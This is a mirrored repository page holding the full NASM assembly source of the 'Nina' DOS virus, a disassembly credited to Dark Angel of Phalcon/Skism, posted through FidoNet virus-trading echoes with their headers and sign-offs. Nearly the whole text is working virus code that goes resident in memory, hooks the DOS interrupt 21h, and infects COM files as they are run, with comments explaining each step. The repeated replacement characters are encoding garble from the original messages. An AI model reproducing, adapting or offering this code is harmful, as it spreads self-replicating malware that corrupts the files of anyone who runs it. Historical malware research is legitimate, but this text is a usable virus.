mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
188 lines
7.2 KiB
NASM
188 lines
7.2 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 35 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : NINA.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37)
|
|||
|
;* To : Viral Doctor
|
|||
|
;* Subj : NINA.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 100h
|
|||
|
; Disassembly done by Dark Angel of Phalcon/Skism
|
|||
|
; for 40Hex Number 9, Volume 2 Issue 5
|
|||
|
start:
|
|||
|
push ax
|
|||
|
mov ax,9753h ; installation check
|
|||
|
int 21h
|
|||
|
mov ax,ds
|
|||
|
dec ax
|
|||
|
mov ds,ax ; ds->program MCB
|
|||
|
mov ax,ds:[3] ; get size word
|
|||
|
push bx
|
|||
|
push es
|
|||
|
sub ax,40h ; reserve 40h paragraphs
|
|||
|
mov bx,ax
|
|||
|
mov ah,4Ah ; Shrink memory allocation
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,48h ; Allocate 3Fh paragraphs
|
|||
|
mov bx,3Fh ; for the virus
|
|||
|
int 21h
|
|||
|
|
|||
|
mov es,ax ; copy virus to high
|
|||
|
xor di,di ; memory
|
|||
|
mov si,offset start + 10h ; start at MCB:110h
|
|||
|
mov cx,100h ; (same as PSP:100h)
|
|||
|
rep movsb
|
|||
|
sub ax,10h ; adjust offset as if it
|
|||
|
push ax ; originated at 100h
|
|||
|
mov ax,offset highentry
|
|||
|
push ax
|
|||
|
retf
|
|||
|
|
|||
|
endfile dw 100h ; size of infected COM file
|
|||
|
|
|||
|
highentry:
|
|||
|
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the
|
|||
|
; memory isn't freed when the
|
|||
|
; program terminates
|
|||
|
mov ax,3521h ; get int 21h vector
|
|||
|
int 21h
|
|||
|
|
|||
|
mov word ptr cs:oldint21,bx ; save it
|
|||
|
mov word ptr cs:oldint21+2,es
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov dx,bx
|
|||
|
mov ax,2591h ; redirect int 91h to int 21h
|
|||
|
int 21h
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset int21
|
|||
|
mov al,21h ; set int 21h to virus vector
|
|||
|
int 21h
|
|||
|
|
|||
|
pop ds ; ds->original program PSP
|
|||
|
pop bx
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
return_COM:
|
|||
|
mov di,100h ; restore original
|
|||
|
mov si,endfile ; file
|
|||
|
add si,di ; adjust for COM starting
|
|||
|
mov cx,100h ; offset
|
|||
|
rep movsb
|
|||
|
pop ax
|
|||
|
push ds ; jmp back to original
|
|||
|
mov bp,100h ; file (PSP:100)
|
|||
|
push bp
|
|||
|
retf
|
|||
|
exit_install:
|
|||
|
pop ax ; pop CS:IP and flags in
|
|||
|
pop ax ; order to balance the
|
|||
|
pop ax ; stack and then exit the
|
|||
|
jmp short return_COM ; infected COM file
|
|||
|
int21:
|
|||
|
cmp ax,9753h ; installation check?
|
|||
|
je exit_install
|
|||
|
cmp ax,4B00h ; execute?
|
|||
|
jne exitint21 ; nope, quit
|
|||
|
push ax ; save registers
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
call infect
|
|||
|
pop ds ; restore registers
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
exitint21:
|
|||
|
db 0eah ; jmp far ptr
|
|||
|
oldint21 dd ?
|
|||
|
|
|||
|
infect:
|
|||
|
mov ax,3D02h ; open file read/write
|
|||
|
int 91h
|
|||
|
jc exit_infect
|
|||
|
mov bx,ax
|
|||
|
mov cx,100h
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov ah,3Fh ; Read first 100h bytes
|
|||
|
mov dx,offset endvirus
|
|||
|
int 91h
|
|||
|
mov ax,word ptr endvirus
|
|||
|
cmp ax,'MZ' ; exit if EXE
|
|||
|
je close_exit_infect
|
|||
|
cmp ax,'ZM' ; exit if EXE
|
|||
|
je close_exit_infect
|
|||
|
cmp word ptr endvirus+2,9753h ; exit if already
|
|||
|
je close_exit_infect ; infected
|
|||
|
mov al,2 ; go to end of file
|
|||
|
call move_file_pointer
|
|||
|
cmp ax,0FEB0h ; exit if too large
|
|||
|
ja close_exit_infect
|
|||
|
cmp ax,1F4h ; or too small for
|
|||
|
jb close_exit_infect ; infection
|
|||
|
mov endfile,ax ; save file size
|
|||
|
call write
|
|||
|
mov al,0 ; go to start of file
|
|||
|
call move_file_pointer
|
|||
|
mov dx,100h ; write virus
|
|||
|
call write
|
|||
|
close_exit_infect:
|
|||
|
mov ah,3Eh ; Close file
|
|||
|
int 91h
|
|||
|
exit_infect:
|
|||
|
retn
|
|||
|
|
|||
|
move_file_pointer:
|
|||
|
push dx
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
mov ah,42h
|
|||
|
int 91h
|
|||
|
pop dx
|
|||
|
retn
|
|||
|
|
|||
|
write:
|
|||
|
mov ah,40h
|
|||
|
mov cx,100h
|
|||
|
int 91h
|
|||
|
retn
|
|||
|
|
|||
|
db 'Nina'
|
|||
|
endvirus:
|
|||
|
int 20h ; original COM file
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
;-+- Terminate 1.50/Pro
|
|||
|
; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/yx Extended memory swapping
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|